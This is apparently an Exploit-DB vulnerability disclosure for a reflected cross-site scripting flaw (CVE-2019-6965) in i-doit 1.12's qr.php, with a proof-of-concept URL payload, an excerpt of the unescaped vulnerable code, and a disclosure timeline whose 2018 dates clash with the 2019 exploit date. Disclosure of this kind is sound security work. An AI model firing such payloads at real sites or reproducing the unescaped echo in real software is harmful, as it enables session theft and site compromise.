# Exploit Title: i-doit 1.12 Cross Site Scripting on qr.php file# Date: 28-03-2019# Software Link: https://www.i-doit.org/# Version: 1.12# Exploit Author: BlackFog Team# Contact: info@securelayer7.net# Website: https://securelayer7.net# Category: webapps# Tested on: Firefox in Kali Linux.# CVE: CVE-2019-6965
Vendor Description
==================
i-doit offers you a professional IT-documentation solution based on ITIL
guidelines. You can document IT systems and their changes, define emergency
plans, display vital information and ensure a stable and efficient
operation of IT networks.
Attack Type
==================
Reflected Cross Site Scripting on qr.php filein URL perameter reported By
Touhid M.Shaikh(@touhidshaikh22).
Proof of Concept
==================
https://IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
Vulnerable Code.==================---------------------------------- qr.php Source Code
-----------------------------..................................... SNIP
........................................
$l_url = @$_GET['url'];<--- Vulnerable
Perameter
..................................... SNIP
........................................<img id="code" src="https://www.exploit-db.com/exploits/46620/<?php echo $l_url; ?>images/ajax-loading.gif"
alt="Error loading the QR Code"/><--- DisplayHere without any
validation.------------------------------qr.php Source Code ends
---------------------------
Fixed
======
Update to latest
Timeline
========10 Jan,2018=== Update to Customer
11 Jan,2018=== Got Mail to Trigger the issue and we are able to repoduce
the same.15 Jan,2018=== Provided Hotfix.17 Jan,2018=== Got Thanks for responsible disclosure and agree to publish
on public.